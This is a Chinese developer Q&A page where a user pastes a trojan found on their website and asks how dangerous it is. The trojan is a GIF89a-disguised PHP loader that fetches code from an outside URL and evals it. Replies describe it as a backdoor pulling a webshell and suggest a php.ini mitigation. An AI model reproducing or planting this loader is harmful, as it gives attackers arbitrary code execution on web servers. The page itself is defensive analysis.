极客观点
项目管理
HarmonyOS
Gif89a
<?php
$c=&$cv;
$cv='http://www.sdcshr.com/style/admin/2.txt';
$b=file_get_contents($c);
@eval('?>'.`/******/`.$b);请问上述域名和这个木马有关联吗,具体能造成多大破坏力。
网站扫描出木马文件,内容如下,破坏力如何?
阅读 2.1k
无所不能, 只要你运行PHP的linux用户可以干的事,木马都可以干.
base64的内容是一个 类似 FTP的程序, 可以上传下载,运行程序.
把 php.ini 里面的允许读取 远程文件关了就好了.
破坏力很高。
简单的说,这是一个可以执行任意 PHP 代码的后门。
简单的说,就是这里会去执行 http://www.sdcshr.com/style/admin/2.txt 这个链接返回的代码,目前看起来,返回的是一个 webshell。
😮
撰写回答
你尚未登录,登录后可以
- 和开发者交流问题的细节
- 关注并接收问题和回答的更新提醒
- 参与内容的编辑和改进,让解决方法与时俱进
推荐问题
求java/php大佬帮帮忙?
最近遇到一个需求,需要对接第三方平台,然后对面只给公钥和私钥 ,本身我是用php开发的,第三方的demo 是java 头大完全不知道什么意思,看不懂java写法 有没有大哥帮我写个php的类这是第三方demo提供的加密加签方法以下是完整文件package com.example.guojindemo.utils;1 回答4.1k 阅读✓ 已解决
新人求看下如何用php对接第三方接口?
新人求解第三方的对接口怎么写curl 求大神写个php 的curl3 回答1.9k 阅读✓ 已解决
Hyperf Swagger 如何使用?
根据 https://hyperf.wiki/3.1/#/zh-cn/swagger?id=hyperf-swagger 官方文档安装配置,但是文档太简单了,出了问题不知道怎么排查,网络文章写的也让人摸不着头脑,不知道别人的json 是怎么生成的。2 回答2.2k 阅读✓ 已解决
在Windows下开发的gin项目如何不是linux下的宝塔?
在windows下用gin开发了一个电商平台,要如何部署到公司linux服务器上,服务器是用宝塔搭建管理?2 回答2.2k 阅读
Laravel Framework 11.38.2 版本 路由调用api接口报错404?
使用web接口都可以调用但使用api接口就报错web文件api文件这是为什么呢?有大佬知道吗?1 回答1.4k 阅读✓ 已解决
SpringCloudAlibaba官方推荐的Springboot版本有漏洞?
spring cloud 版本问题https://sca.aliyun.com/docs/2022/overview/version-explain/?spm=5176.29160081.0.0.748065cbJIDby81 回答835 阅读✓ 已解决
如何在lnmp环境下安装pecl_redis扩展并解决编译错误?
cc -I. -I/tmp/redis-6.1.0 -I/tmp/redis-6.1.0/include -I/tmp/redis-6.1.0/main -I/tmp/redis-6.1.0 -I/usr/local/php-generic-8.2/include/php -I/usr/local/php-generic-8.2/include/php/main -I/usr/local/php-generic-8.2/include/php/TSRM -I/usr/local/php-generic-8.2/include/php/Zend -I/usr/local/php-gener...799 阅读
这是这个文件decode 出来的内容,自己看吧
https://www.unphp.net/decode/a0e5307bce8f36d3420e273a2daaa7a9/